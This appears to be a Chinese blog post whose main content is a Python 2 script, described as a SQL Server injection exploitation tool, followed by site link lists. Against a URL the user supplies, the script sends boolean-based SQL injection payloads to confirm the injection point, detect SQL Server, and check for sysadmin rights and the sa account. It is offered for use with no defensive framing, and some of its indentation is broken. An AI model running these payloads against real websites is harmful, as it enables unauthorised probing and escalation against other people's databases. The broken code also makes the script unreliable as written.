编程 Python

Python编写检测数据库SA用户的方法

Posted in Python onJuly 11, 2014

本文讲述一个用Python写的小程序，用于有注入点的链接，以检测当前数据库用户是否为sa，详细代码如下：

# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!这个URL是有注入漏洞的!n" 
  print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."  
  is_SQLServer() 
  else: 
  print "[错误]你确定这个URL能用?换个别的试试吧!n"

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[错误]数据库好像不是SQL Server的!n" 
  else: 
  print "[信息]确认是SQL Server数据库!n" 
  print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不具有sysadmin权限!n" 
  else:  
    print "[信息]当前数据库用户具有sysadmin权限!n" 
    print "[信息]检测当前用户是不是SA,请耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不是SA!n" 
  else:  
    print "[信息]当前数据库用户是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  
if url == '':  
  print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"  
  exit(1)  
 
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  
if judge == '':  
  print "[错误]判断字符串不能为空!"  
  exit(1)  
 
is_sqlable()

- Author -

shichen2014

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python三元运算符实现方法

Dec 17 Python

python命令行参数解析OptionParser类用法实例

Oct 09 Python

python中range()与xrange()用法分析

Sep 21 Python

总结Python图形用户界面和游戏开发知识点

May 22 Python

Flask配置Cors跨域的实现

Jul 12 Python

Django+uni-app实现数据通信中的请求跨域的示例代码

Oct 12 Python

Python hashlib模块实例使用详解

Dec 24 Python

小 200 行 Python 代码制作一个换脸程序

May 12 Python

python中id函数运行方式

Jul 03 Python

PyCharm vs VSCode，作为python开发者，你更倾向哪种IDE呢？

Aug 17 Python

python 解决selenium 中的 .clear()方法失效问题

Sep 01 Python

Python读取多列数据以及用matplotlib制作图表方法实例

Sep 23 Python

python实现的生成随机迷宫算法核心代码分享（含游戏完整代码）

Jul 11 #Python

python文件和目录操作函数小结

Jul 11 #Python

python实现的登陆Discuz!论坛通用代码分享

Jul 11 #Python

Python Socket编程入门教程

Jul 11 #Python

python使用正则搜索字符串或文件中的浮点数代码实例

Jul 11 #Python

Python实现的二维码生成小软件

Jul 11 #Python

让python同时兼容python2和python3的8个技巧分享

Jul 11 #Python

You might like

星际玩家的三大定律

2020/03/04 星际争霸

IStream与TStream之间的相互转换

2008/08/01 PHP

php下载文件源代码(强制任意文件格式下载)

2014/05/09 PHP

PHP递归实现文件夹的复制、删除、查看大小操作示例

2017/08/11 PHP

JQuery 将元素显示在屏幕的中央的代码

2010/02/27 Javascript

使用jQuery Ajax功能时需要注意的一个问题(内存溢出)

2012/05/30 Javascript

javascript-表格排序(降序/反序)实现介绍(附图)

2013/05/30 Javascript

目前流行的JavaScript库的介绍及对比

2013/09/29 Javascript

浅析jquery的js图表组件highcharts

2014/03/06 Javascript

js的延迟执行问题分析

2014/06/23 Javascript

jquery 构造函数在表单提交过程中修改数据

2015/05/25 Javascript

基于javascript实现彩票随机数生成（升级版）

2020/04/17 Javascript

怎么限制input的text里输入的值只能是数字(正则、js)

2016/05/16 Javascript

JavaScript类型系统之布尔Boolean类型详解

2016/06/26 Javascript

jQuery validate插件功能与用法详解

2016/12/15 Javascript

Angular4项目中添加i18n国际化插件ngx-translate的步骤详解

2017/07/02 Javascript

通过cordova将vue项目打包为webapp的方法

2019/02/02 Javascript

JS中实现浅拷贝和深拷贝的代码详解

2019/06/05 Javascript

layui 实现table翻页滚动条位置保持不变的例子

2019/09/05 Javascript

js生成1到100的随机数最简单的实现方法

2020/02/07 Javascript

基于python yield机制的异步操作同步化编程模型

2016/03/18 Python

TensorFlow安装及jupyter notebook配置方法

2017/09/08 Python

使用python list 查找所有匹配元素的位置实例

2019/06/11 Python

在Django中实现添加user到group并查看

2019/11/18 Python

python3的pip路径在哪

2020/06/23 Python

详解Python调用系统命令的六种方法

2021/01/28 Python

印度尼西亚电子产品购物网站：Kliknklik

2018/06/05 全球购物

什么是重载？CTS、CLS和CLR分别做何解释

2012/05/06 面试题

电子商务专业毕业生工作推荐信

2013/11/17 职场文书

总经理岗位职责描述

2014/02/08 职场文书

军训自我鉴定200字

2014/02/13 职场文书

车辆工程专业求职信

2014/06/14 职场文书

群众路线专项整治方案

2014/10/27 职场文书

爱护公物主题班会

2015/08/17 职场文书

2016教师政治学习心得体会

2016/01/23 职场文书

Linux系统下安装PHP7.3版本

2021/06/26 PHP